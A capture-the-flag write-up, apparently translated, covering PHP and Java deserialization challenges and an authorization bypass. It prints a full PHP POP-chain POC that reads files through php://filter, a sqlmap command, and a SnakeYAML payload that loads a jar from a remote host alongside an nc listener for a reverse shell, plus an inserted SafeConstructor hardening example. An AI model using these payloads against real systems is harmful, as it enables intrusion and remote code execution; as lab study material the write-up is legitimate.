Guessing and going by feel from start to finish...
I didn't do this challenge myself; here is the writeup from the club's WeChat public account:
python3 sqlmap.py -u http://url/?id=1 --dbs --batch
The flag is in the flag column of table 3eDf4f07efC9ee16 in database ctf.
I kept thinking about how to bypass __wakeup, and only later noticed the __isset() magic method, which I had overlooked at first.
error_reporting(0);
class A{
    public $file;
    public function __construct(){
        echo "Welcome to HECTF Have fun!!!\n";
    }
    public function __wakeup(){
        if(isset($this->file->var)){
            $this->file = "flag.php";
        }
        else{
            $this->file = "index.php";
        }
    }
    public function __destruct(){
        highlight_file($this->file);
    }
}
class B{
    public $str;
    public $huang;
    public function __isset($arg)
    {
        echo "难道我真的要失败了,吗".$this->str;
    }
    public function __call($fun1,$arg)
    {
        return $this->huang->str;
    }
}
class C{
    public $eee;
    public $aaa="who are you?";
    public $ccc;
    public function __toString()
    {
        $this->eee->flag();
    }
    public function __get($css)
    {
        $function = $this->ccc;
        return $function();
    }
}
class D{
    private $ddd;
    private $ext;
    public function flag(){
        $this->ext->nisa($this->ddd);
    }
    public function __invoke()
    {
        echo new $this->ddd($this->ext);
    }
}
$gagaga = new A();
unserialize(serialize($gagaga));
$data = $_POST['data'];
unserialize($data);
unserialize() calls A::__wakeup(); the isset() in __wakeup triggers B::__isset, whose echo calls C::__toString, which calls flag(); the flag() method does not exist on B, so B::__call is invoked and returns the str property; that property does not exist on C, so C::__get() is called; using the returned value as a function calls D::__invoke().
Inside __invoke() the code has the form echo new a(a(a(b))), which can trigger a native class during deserialization; for details see my earlier post: PHP反序列化原生类利用 (exploiting PHP native classes in deserialization).
POC:
<?php
class A{
    public $file;
}
class B{
    public $str;
    public $huang;
}
class C{
    public $eee;
    public $aaa;
    public $ccc;
}
class D{
    public $ddd;
    public $ext;
}
$gagaga = new A();
$gagaga->file = new B();
$gagaga->file->str = new C();
$gagaga->file->str->eee = new B();
$gagaga->file->str->eee->huang = new C();
$gagaga->file->str->eee->huang->ccc = new D();
$gagaga->file->str->eee->huang->ccc->ddd = "SplFileObject";
$gagaga->file->str->eee->huang->ccc->ext = "php://filter/read=convert.base64-encode/resource=../../../ffflllllaaaaaaggggg.txt";
echo serialize($gagaga);
Note:
The $ddd and $ext properties are private, so once the chain is built you need to prefix their names with %00D%00 and add 3 to the length; also, the flag is split across two lines, so SplFileObject cannot read it directly and it has to be read through the php://filter stream wrapper.
It worked locally, but for some reason I thought the challenge environment had no outbound network access at the time, so I assumed I had to write a memory shell; after spending ages on it I still couldn't get it to work. In the end the writeup showed that it did have outbound access, and I have no idea where the reverse shell went wrong.....
The challenge added an authc interceptor, so requests to /admin/* are intercepted, but it can be bypassed: appending a trailing slash ("/") to the path under /admin/* gets past it, so accessing /admin/hello/ works.
After requesting /admin/hello/, the data parameter is passed into YAML deserialization:
@RequestMapping({"/admin/hello"})
@ResponseBody
public String admin(@RequestParam(name = "data", required = false) String data, Model model) throws Exception {
    try {
        if (data.startsWith("!!")) {
            return "Hacker!!!";
        } else {
            Yaml yaml = new Yaml();
            yaml.load(data);
            return "Good Yaml";
        }
    } catch (Exception var4) {
        return "Give me one data!";
    }
}
An existing project can be used directly; build the reverse shell command into it.
Generate the corresponding jar:
javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .
Put the generated yaml-payload.jar on a VPS and listen on the reverse shell port:
nc -lvnp 10000
Finally, construct the deserialization payload; since !! is filtered above, the filter needs a bypass:
!<tag:yaml.org,2002:javax.script.ScriptEngineManager>
[!<tag:yaml.org,2002:java.net.URLClassLoader>
[[!<tag:yaml.org,2002:java.net.URL>
["http://ip/yaml-payload.jar"]]]]
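The startsWith("!!") check above only sees the short tag syntax, which is why the long-form !&lt;tag:yaml.org,2002:...&gt; tag slips past it. The correct fix is not a longer denylist but a constructor that only knows the standard YAML tags. The following is an added example (not code from the challenge or the writeup) showing the weak check beside the hardened load; it assumes SnakeYAML 1.33 or later, where SafeConstructor(LoaderOptions) exists, and the input strings are constructed for illustration.

```java
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

public class YamlHardening {

    // The challenge's check: a prefix denylist that only recognises the short "!!" tag syntax.
    // The equivalent long form "!<tag:yaml.org,2002:...>" names the same tag but starts with "!<".
    static boolean weakPrefixFilter(String data) {
        return !data.startsWith("!!");
    }

    // Hardened load: SafeConstructor maps only the standard tags (str, int, seq, map, ...),
    // so any other tag, in either syntax, fails with a ConstructorException before any
    // class is looked up or instantiated.
    static Object loadSafely(String data) {
        Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions()));
        return yaml.load(data);
    }

    public static void main(String[] args) {
        // Constructed inputs: both tagged documents name the same harmless class,
        // the difference is only in tag syntax.
        String shortForm = "!!java.lang.Object {}";
        String longForm  = "!<tag:yaml.org,2002:java.lang.Object> {}";
        String benign    = "name: hello\ncount: 3";

        System.out.println("prefix filter accepts short form: " + weakPrefixFilter(shortForm));
        System.out.println("prefix filter accepts long form:  " + weakPrefixFilter(longForm));

        for (String doc : new String[] {shortForm, longForm, benign}) {
            try {
                System.out.println("safe load OK: " + loadSafely(doc));
            } catch (YAMLException e) {
                // Both tagged documents end up here; only the plain mapping loads.
                System.out.println("safe load rejected: " + e.getClass().getSimpleName());
            }
        }
    }
}
```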
The challenge hints at CC, CB, C3P0...
No jar was provided; it is just an unfiltered deserialization:
package com.butler.easyjava.MyController;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;
import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;
import java.util.Base64;
@Controller
public class HelloController {
    @RequestMapping({"/"})
    @ResponseBody
    public String index(@RequestParam(name = "data", required = false) String data) throws Exception {
        try {
            ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Base64.getDecoder().decode(data));
            ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
            objectInputStream.readObject();
            System.out.println(data);
            return "Success";
        } catch (Exception e) {
            return "Please Post RequestParam data=";
        }
    }
}
I tried CC and it didn't work; I figured there might be some WAF inside and stopped there, but it turned out CB without the CC dependency went straight through. Next time I must try all of them!!!!
Unlike the earlier PHP native-class exploitation there is no echo here, but the exploitation method can be found directly by searching.
The remaining challenges are phar and pickle deserialization; there is no environment for them, so I didn't attempt them.